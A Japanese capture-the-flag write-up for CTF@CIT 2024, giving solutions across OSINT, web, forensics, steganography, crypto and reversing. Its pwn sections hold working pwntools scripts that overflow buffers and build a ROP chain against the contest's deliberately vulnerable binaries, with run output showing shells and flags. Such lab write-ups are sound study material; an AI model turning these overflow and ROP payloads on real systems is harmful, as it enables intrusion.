この大会は2024/4/20 6:00(JST)~2024/4/22 4:00(JST)に開催されました。
今回もチームで参戦。結果は3690点で553チーム中66位でした。
自分で解けた問題をWriteupとして書いておきます。
Welcome to the first CTF@CIT (Welcome!)
問題にフラグが書いてあった。
CIT{F1rst_Fl4g}
Discord (Welcome!)
Discordに入り、#ctf-infoチャネルのトピックを見ると、フラグが書いてあった。
CIT{y0u_4r3_1n_th3_d1sc0rd_y1p33}
Lost Flag (Misc)
challengesのページでHTMLソースを見ると、以下の部分があった。
<p style="color:white;">CIT{Y0U_H4V3_3Y3S!}</p>
CIT{Y0U_H4V3_3Y3S!}
Robots (OSINT)
https://ctf.cyber-cit.club/robots.txtにアクセスすると、以下のように書いてあった。
User-agent: *
Disallow: /admin
CIT{1m_4_r0b0t}
CIT{1m_4_r0b0t}
I'm as cold as a wise man (OSINT)
写真の上の方に絞り、画像検索する。左の建物が一致していそうな画像が見つかり、そのページを見てみる。
https://www.coldfootcamp.com/eat
Google mapでそのあたりを見てみると、通りの名前は以下になっている。
Coldfoot Rd (コールドフットロード)
CIT{coldfoot}
ezpz (Pwn)
Ghidraでデコンパイルする。
undefined8 main(void) { int iVar1; time_t tVar2; char local_58 [72]; ulong local_10; tVar2 = time((time_t *)0x0); srand((uint)tVar2); iVar1 = rand(); local_10 = (ulong)(long)iVar1 % 5; setbuf(stdout,(char *)0x0); setbuf(stdin,(char *)0x0); setbuf(stderr,(char *)0x0); puts("\x1b[32m~ authored by nop.so (https://nop.so/) ~\x1b[0m\n\n"); puts(*(char **)(pwn_pep_talk + local_10 * 8)); puts("\n"); puts("i\'m so tired of pwning and pwning all these insecure binaries."); puts("could you write me something to put the pep back in my step so"); puts("I can pop some shells and make nop.so proud?"); gets(local_58); puts("\nthank you. I will cherish this.\n"); if (local_10 == 0xffffffffffffffff) { system("/bin/sh"); } return 0; }
BOFでlocal_10を0xffffffffffffffffで上書きすればよい。
#!/usr/bin/env python3 from pwn import * if len(sys.argv) == 1: p = remote('165.227.103.166', 6002) else: p = process('./ezpz') payload = b'A' * 72 payload += p64(0xffffffffffffffff) data = p.recvuntil(b'?\n').decode().rstrip() print(data) print(payload) p.sendline(payload) p.interactive()
実行結果は以下の通り。
[+] Opening connection to 165.227.103.166 on port 6002: Done
~ authored by nop.so (https://nop.so/) ~
"to pwn or not to pwn. that is the question."
i'm so tired of pwning and pwning all these insecure binaries.
could you write me something to put the pep back in my step so
I can pop some shells and make nop.so proud?
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\xff\xff\xff\xff\xff\xff\xff\xff'
[*] Switching to interactive mode
thank you. I will cherish this.
$ ls
flag.txt
run
$ cat flag.txt
CIT{pr0bably_t00_3azy_4_U_9920int3oksalfqFoi3b3ofiql7}
CIT{pr0bably_t00_3azy_4_U_9920int3oksalfqFoi3b3ofiql7}
ret2monke (Pwn)
Ghidraでデコンパイルする。
undefined8 main(void) { char local_78 [112]; setbuf(stdout,(char *)0x0); setbuf(stdin,(char *)0x0); setbuf(stderr,(char *)0x0); puts("\x1b[32m~ authored by nop.so (https://nop.so/) ~\x1b[0m\n\n"); puts("in today\'s society, is there not joy to be found in the simpler things?"); gets(local_78); return 0x13; } void monke(void) { undefined8 local_118; undefined8 local_110; undefined8 local_108; undefined8 local_100; undefined8 local_f8; undefined8 local_f0; undefined8 local_e8; undefined8 local_e0; undefined8 local_d8; undefined8 local_d0; undefined8 local_c8; undefined8 local_c0; undefined8 local_b8; undefined8 local_b0; undefined8 local_a8; undefined8 local_a0; undefined8 local_98; undefined8 local_90; undefined8 local_88; undefined8 local_80; undefined8 local_78; undefined8 local_70; undefined8 local_68; undefined8 local_60; undefined8 local_58; undefined8 local_50; undefined8 local_48; undefined8 local_40; undefined8 local_38; undefined8 local_30; undefined8 local_28; undefined8 local_20; FILE *local_10; local_118 = 0; local_110 = 0; local_108 = 0; local_100 = 0; local_f8 = 0; local_f0 = 0; local_e8 = 0; local_e0 = 0; local_d8 = 0; local_d0 = 0; local_c8 = 0; local_c0 = 0; local_b8 = 0; local_b0 = 0; local_a8 = 0; local_a0 = 0; local_98 = 0; local_90 = 0; local_88 = 0; local_80 = 0; local_78 = 0; local_70 = 0; local_68 = 0; local_60 = 0; local_58 = 0; local_50 = 0; local_48 = 0; local_40 = 0; local_38 = 0; local_30 = 0; local_28 = 0; local_20 = 0; local_10 = fopen("./flag.txt","r"); if (local_10 == (FILE *)0x0) { puts("internal error - contact @nop.so on discord"); /* WARNING: Subroutine does not return */ exit(-1); } fgets((char *)&local_118,0x100,local_10); puts((char *)&local_118); fclose(local_10); return; }
BOFでmonke関数をコールできれば良い。
$ ROPgadget --binary ret2monke | grep ": ret" 0x000000000040101a : ret 0x0000000000401042 : ret 0x2f 0x0000000000401022 : retf 0x2f
#!/usr/bin/env python3 from pwn import * if len(sys.argv) == 1: p = remote('165.227.103.166', 6001) else: p = process('./ret2monke') elf = ELF('./ret2monke') ret_addr = 0x40101a monke_addr = elf.symbols['monke'] payload = b'A' * 120 payload += p64(ret_addr) payload += p64(monke_addr) data = p.recvuntil(b'?\n').decode().rstrip() print(data) print(payload) p.sendline(payload) data = p.recvuntil(b'\n').decode().rstrip() print(data)
実行結果は以下の通り。
[+] Opening connection to 165.227.103.166 on port 6001: Done
[*] '/media/sf_Shared/ret2monke'
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x400000)
~ authored by nop.so (https://nop.so/) ~
in today's society, is there not joy to be found in the simpler things?
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\x1a\x10@\x00\x00\x00\x00\x00\x86\x11@\x00\x00\x00\x00\x00'
CIT{pl3nty_0f_b4n4n4z_f0r_y0u!_992obAKLRsklnqf235io1lWK9io13}
[*] Closed connection to 165.227.103.166 port 6001
CIT{pl3nty_0f_b4n4n4z_f0r_y0u!_992obAKLRsklnqf235io1lWK9io13}
twostep (Pwn)
Ghidraでデコンパイルする。
undefined8 main(void) { int iVar1; time_t tVar2; char local_1b8 [432]; tVar2 = time((time_t *)0x0); srand((uint)tVar2); setbuf(stdout,(char *)0x0); setbuf(stdin,(char *)0x0); setbuf(stderr,(char *)0x0); iVar1 = rand(); arg1 = iVar1 % 0x45; iVar1 = rand(); arg2 = iVar1 % 0x1a4; puts("\x1b[32m~ authored by nop.so (https://nop.so/) ~\x1b[0m\n\n"); puts("omg hi! I\'ve been practicing my texas two-step, but I can\'t quite figure it out."); puts("every time I almost nail it, I stumble and mess it all up. This will not do."); puts("\n"); puts("I have a meeting with an important niche internet microcelebrity in "); printf("%d HOURS and %d MINUTES, \nand ",(ulong)arg1,(ulong)arg2); puts("I can\'t afford to make a single mistake!"); puts("\n"); puts("have any advice for a stepper such as myself to lock in and fix my 2 step game?"); gets(local_1b8); return 0x13; } void left2_foot_creep_FORBIDDEN(int param_1) { undefined8 local_118; undefined8 local_110; undefined8 local_108; undefined8 local_100; undefined8 local_f8; undefined8 local_f0; undefined8 local_e8; undefined8 local_e0; undefined8 local_d8; undefined8 local_d0; undefined8 local_c8; undefined8 local_c0; undefined8 local_b8; undefined8 local_b0; undefined8 local_a8; undefined8 local_a0; undefined8 local_98; undefined8 local_90; undefined8 local_88; undefined8 local_80; undefined8 local_78; undefined8 local_70; undefined8 local_68; undefined8 local_60; undefined8 local_58; undefined8 local_50; undefined8 local_48; undefined8 local_40; undefined8 local_38; undefined8 local_30; undefined8 local_28; undefined8 local_20; FILE *local_10; if ((log == 1) && (param_1 == arg2)) { puts("magnificalicious. luh flaggington for you: \n"); local_118 = 0; local_110 = 0; local_108 = 0; local_100 = 0; local_f8 = 0; local_f0 = 0; local_e8 = 0; local_e0 = 0; local_d8 = 0; local_d0 = 0; local_c8 = 0; local_c0 = 0; local_b8 = 0; local_b0 = 0; local_a8 = 0; local_a0 = 0; local_98 = 0; local_90 = 0; local_88 = 0; local_80 = 0; local_78 = 0; local_70 = 0; local_68 = 0; local_60 = 0; local_58 = 0; local_50 = 0; local_48 = 0; local_40 = 0; local_38 = 0; local_30 = 0; local_28 = 0; local_20 = 0; local_10 = fopen("./flag.txt","r"); if (local_10 == (FILE *)0x0) { puts("internal error - contact @nop.so on discord"); /* WARNING: Subroutine does not return */ exit(-1); } fgets((char *)&local_118,0x100,local_10); puts((char *)&local_118); fclose(local_10); return; } puts("not quite! teehee\n"); puts("connection terminated."); /* WARNING: Subroutine does not return */ exit(0x1a4); } void right_foot_creep1(int param_1) { if (param_1 != arg1) { puts("wrong! womp womp."); /* WARNING: Subroutine does not return */ exit(0x16); } log = 1; puts("almost. there."); return; }
BOFで以下を実行するようにする。
・引数にarg1を指定してright_foot_creep1関数をコールする。 ・引数にarg2を指定してleft2_foot_creep_FORBIDDEN関数をコールする。
$ ROPgadget --binary twostep | grep ": ret" 0x000000000040101a : ret 0x000000000040149f : ret 0x1589 0x0000000000401042 : ret 0x2f 0x00000000004014ba : ret 0xfac1 0x00000000004011fa : ret 0xfffe 0x0000000000401022 : retf 0x2f 0x00000000004014c4 : retf 0xca69 0x0000000000401498 : retf 0xca6b $ ROPgadget --binary twostep --re "pop rdi" Gadgets information ============================================================ 0x00000000004011c5 : mov dl, byte ptr [rbp + 0x48] ; mov ebp, esp ; pop rdi ; ret 0x00000000004011c8 : mov ebp, esp ; pop rdi ; ret 0x00000000004011c7 : mov rbp, rsp ; pop rdi ; ret 0x00000000004011ca : pop rdi ; ret 0x00000000004011c6 : push rbp ; mov rbp, rsp ; pop rdi ; ret Unique gadgets found: 5
#!/usr/bin/env python3 from pwn import * if len(sys.argv) == 1: p = remote('165.227.103.166', 6003) else: p = process('./twostep') elf = ELF('./twostep') ret_addr = 0x40101a pop_rdi_addr = 0x4011ca right_foot_creep1_addr = elf.symbols['right_foot_creep1'] left2_foot_creep_FORBIDDEN_addr = elf.symbols['left2_foot_creep_FORBIDDEN'] data = p.recvuntil(b'in \n').decode().rstrip() print(data) data = p.recvline().decode().rstrip() print(data) arg1 = int(data.split(' ')[0]) arg2 = int(data.split(' ')[3]) payload = b'A' * 440 payload += p64(ret_addr) payload += p64(pop_rdi_addr) payload += p64(arg1) payload += p64(right_foot_creep1_addr) payload += p64(pop_rdi_addr) payload += p64(arg2) payload += p64(left2_foot_creep_FORBIDDEN_addr) data = p.recvuntil(b'?\n').decode().rstrip() print(data) print(payload) p.sendline(payload) for _ in range(4): data = p.recvline().decode().rstrip() print(data)
実行結果は以下の通り。
[+] Opening connection to 165.227.103.166 on port 6003: Done
[*] '/media/sf_Shared/twostep'
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x400000)
~ authored by nop.so (https://nop.so/) ~
omg hi! I've been practicing my texas two-step, but I can't quite figure it out.
every time I almost nail it, I stumble and mess it all up. This will not do.
I have a meeting with an important niche internet microcelebrity in
5 HOURS and 279 MINUTES,
and I can't afford to make a single mistake!
have any advice for a stepper such as myself to lock in and fix my 2 step game?
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\x1a\x10@\x00\x00\x00\x00\x00\xca\x11@\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\xcf\x11@\x00\x00\x00\x00\x00\xca\x11@\x00\x00\x00\x00\x00\x17\x01\x00\x00\x00\x00\x00\x00\x1a\x12@\x00\x00\x00\x00\x00'
almost. there.
magnificalicious. luh flaggington for you:
CIT{n0w_y3r_d4nc1n_thE_t3xas_2step_wbiw28qfe3gr1ddyBiq093kt310}
[*] Closed connection to 165.227.103.166 port 6003
CIT{n0w_y3r_d4nc1n_thE_t3xas_2step_wbiw28qfe3gr1ddyBiq093kt310}
Strung Along (Reverse Engineering)
Ghidraでデコンパイルする。
void __static_initialization_and_destruction_0(void) { long in_FS_OFFSET; allocator local_71; allocator *local_70; char *local_68; undefined *local_60; undefined *local_58; undefined *local_50; undefined *local_48; undefined *local_40; undefined *local_38; undefined *local_30; undefined *local_28; char *local_20 [2]; local_20[0] = *(char **)(in_FS_OFFSET + 0x28); local_68 = "CI"; local_60 = &DAT_00103084; local_58 = &DAT_00103087; local_50 = &DAT_0010308a; local_48 = &DAT_0010308d; local_40 = &DAT_00103090; local_38 = &DAT_00103093; local_30 = &DAT_00103096; local_28 = &DAT_00103099; local_70 = &local_71; /* try { // try from 0010239f to 001023a3 has its CatchHandler @ 001023e6 */ std:: vector<std::__cxx11::basic_string<char,std::char_traits<char>,std::allocator<char>>,std::allocator <std::__cxx11::basic_string<char,std::char_traits<char>,std::allocator<char>>>> ::vector<char_const*const*,void> ((vector<std::__cxx11::basic_string<char,std::char_traits<char>,std::allocator<char>>,st d::allocator<std::__cxx11::basic_string<char,std::char_traits<char>,std::allocator<char> >>> *)t[abi:cxx11],&local_68,local_20,&local_71); std::__new_allocator<std::__cxx11::basic_string<char,std::char_traits<char>,std::allocator<char>>> ::~__new_allocator((__new_allocator<std::__cxx11::basic_string<char,std::char_traits<char>,std::al locator<char>>> *)&local_71); __cxa_atexit(std:: vector<std::__cxx11::basic_string<char,std::char_traits<char>,std::allocator<char>>,s td::allocator<std::__cxx11::basic_string<char,std::char_traits<char>,std::allocator<c har>>>> ::~vector,t[abi:cxx11],&__dso_handle); if (local_20[0] != *(char **)(in_FS_OFFSET + 0x28)) { /* WARNING: Subroutine does not return */ __stack_chk_fail(); } return; } DAT_00103081 XREF[2]: __static_initialization_and_dest __static_initialization_and_dest 00103081 43 ?? 43h C 00103082 49 ?? 49h I 00103083 00 ?? 00h DAT_00103084 XREF[2]: __static_initialization_and_dest __static_initialization_and_dest 00103084 54 ?? 54h T 00103085 7b ?? 7Bh { 00103086 00 ?? 00h DAT_00103087 XREF[2]: __static_initialization_and_dest __static_initialization_and_dest 00103087 50 ?? 50h P 00103088 52 ?? 52h R 00103089 00 ?? 00h DAT_0010308a XREF[2]: __static_initialization_and_dest __static_initialization_and_dest 0010308a 33 ?? 33h 3 0010308b 50 ?? 50h P 0010308c 00 ?? 00h DAT_0010308d XREF[2]: __static_initialization_and_dest __static_initialization_and_dest 0010308d 34 ?? 34h 4 0010308e 52 ?? 52h R 0010308f 00 ?? 00h DAT_00103090 XREF[2]: __static_initialization_and_dest __static_initialization_and_dest 00103090 33 ?? 33h 3 00103091 34 ?? 34h 4 00103092 00 ?? 00h DAT_00103093 XREF[2]: __static_initialization_and_dest __static_initialization_and_dest 00103093 50 ?? 50h P 00103094 34 ?? 34h 4 00103095 00 ?? 00h DAT_00103096 XREF[2]: __static_initialization_and_dest __static_initialization_and_dest 00103096 31 ?? 31h 1 00103097 4e ?? 4Eh N 00103098 00 ?? 00h DAT_00103099 XREF[2]: __static_initialization_and_dest __static_initialization_and_dest 00103099 7d ?? 7Dh } 0010309a 00 ?? 00h
CIT{PR3P4R34P41N}
I can't see it (Web)
$ curl http://138.197.33.187/ -v * Trying 138.197.33.187:80... * Connected to 138.197.33.187 (138.197.33.187) port 80 (#0) > GET / HTTP/1.1 > Host: 138.197.33.187 > User-Agent: curl/7.88.1 > Accept: */* > < HTTP/1.1 200 OK < Server: Werkzeug/2.2.2 Python/3.11.6 < Date: Sat, 20 Apr 2024 22:36:06 GMT < Content-Type: text/html; charset=utf-8 < link: <style.css>; rel=stylesheet; < Set-Cookie: request=Q0lUe24wV195b3VfQ0BuX3M1NV9tZX0=; Path=/ < Refresh: 2; url=https://www.youtube.com/watch?v=dQw4w9WgXcQ < Content-Length: 0 < Connection: close < * Closing connection 0
クッキーのrequestにbase64文字列が設定されている。
$ echo Q0lUe24wV195b3VfQ0BuX3M1NV9tZX0= | base64 -d CIT{n0W_you_C@n_s55_me}
CIT{n0W_you_C@n_s55_me}
Invoice (Forensics)
スポンサーの一人に送信しているが、PDFの送信先は黒塗りしてマスクされている。そのPDFのマスクされている部分をコピペする。
TO: Sir Swaggy 1337 Information Security 22 Beehive Drive Freeport, Maine 04032 Phone: N/A SHIP TO: Sir Swaggy 1337 Information Security 22 Beehive Drive Freeport, Maine
CIT{Sir_Swaggy}
Beep Boop (Forensics)
モールス信号を書き出す。
.. -. . ...- .. -.... ...-- .-. . -. .- -.. .. .--- ... -- ..-. .--- .--- .... -.- ..- ...-- .... -.- -. ...- ..-. ....- -.-- .--- -..- .... -... ....- -..- --- -.-- .-.. .....
デコードすると、以下のようになる。
INEVI63RENADIJSMFJJHKU3HKNVF4YJXHB4XOYL5
$ echo INEVI63RENADIJSMFJJHKU3HKNVF4YJXHB4XOYL5 | base32 -d CIT{q#@4&L*RuSgSj^a78ywa}
CIT{q#@4&L*RuSgSj^a78ywa}
Sniff Sniff (Forensics)
httpでフィルタリングする。No.12492のパケットで以下のユーザ情報をPOSTしていることがわかる。
Form item: "uname" = "username" Form item: "pass" = "Q0lUe2lKNUI5cyNsQXA2aUJOaTZKdFE4fQ=="
$ echo Q0lUe2lKNUI5cyNsQXA2aUJOaTZKdFE4fQ== | base64 -d CIT{iJ5B9s#lAp6iBNi6JtQ8}
CIT{iJ5B9s#lAp6iBNi6JtQ8}
I LOVE PRIME! (Steganography)
$ exiftool meta-moon.jpg ExifTool Version Number : 12.57 File Name : meta-moon.jpg Directory : . File Size : 24 kB File Modification Date/Time : 2024:04:20 06:40:54+09:00 File Access Date/Time : 2024:04:20 06:42:24+09:00 File Inode Change Date/Time : 2024:04:20 06:40:54+09:00 File Permissions : -rwxrwx--- File Type : JPEG File Type Extension : jpg MIME Type : image/jpeg JFIF Version : 1.01 Resolution Unit : inches X Resolution : 72 Y Resolution : 72 XMP Toolkit : Image::ExifTool 12.65 Description : CIT{meta_moon_prime_yummy} Image Width : 1280 Image Height : 720 Encoding Process : Baseline DCT, Huffman coding Bits Per Sample : 8 Color Components : 3 Y Cb Cr Sub Sampling : YCbCr4:2:0 (2 2) Image Size : 1280x720 Megapixels : 0.922
Descriptionにフラグが設定されていた。
CIT{meta_moon_prime_yummy}
Intern (Steganography)
StegSolveで開き、Red plane 0を見ると、フラグが現れた。
CIT{f1r3_th1s_1nt3rn}
The Art of the Beast (Steganography)
$ file the-art-of-the-beast.png the-art-of-the-beast.png: JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 828x895, components 3 $ steghide extract -sf the-art-of-the-beast.png Enter passphrase: wrote extracted data to "misterbeast". $ file misterbeast misterbeast: ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=9e264a1d1bade455908e08feca50817b54fc544f, for GNU/Linux 3.2.0, stripped $ strings misterbeast | grep CIT{ you must love mister beast too!!! here's your flag: CIT{mist4_b34st}
CIT{mist4_b34st}
Very Based (Crypto)
$ echo SU5FVkk2WlhHSlJXT1MyTUdORFZFSkJFTEJSRzRLVDU= | base64 -d INEVI6ZXGJRWOS2MGNDVEJBELBRG4KT5 $ echo INEVI6ZXGJRWOS2MGNDVEJBELBRG4KT5 | base32 -d CIT{72cgKL3GR$$Xbn*}
CIT{72cgKL3GR$$Xbn*}
Forgot My Password (Crypto)
CrackStationでクラックする。
verysecure
CIT{verysecure}
Chosen One (Crypto)
$ ./chosenone Enter string: 12345678 YW!)4:y2 $ ./chosenone Enter string: 987654321 M2y:4)!WY
おそらく換字式暗号になっている。
$ ./chosenone Enter string: !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{|}~ nKpxId]$C/c0eXHLYW!)4:y2MJS'Q^?;wRoEm+}5TU&<Nbh9F,#ta%1[B.ZOgsz`\_luP"f{Aqi3@V>kv8DG*(=6jr7-|~
つまり平文と暗号文の対応は以下のようになっている。
平文 :!"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{|}~
暗号文:nKpxId]$C/c0eXHLYW!)4:y2MJS'Q^?;wRoEm+}5TU&<Nbh9F,#ta%1[B.ZOgsz`\_luP"f{Aqi3@V>kv8DG*(=6jr7-|~以下の暗号文に対応表を見て、復号する。
暗号文:oTt74i!21/0;xLbk_Z3yPNdp|
平文 :CIT{5k38W*,@$0Npb[l7eM&#}
CIT{5k38W*,@$0Npb[l7eM&#}
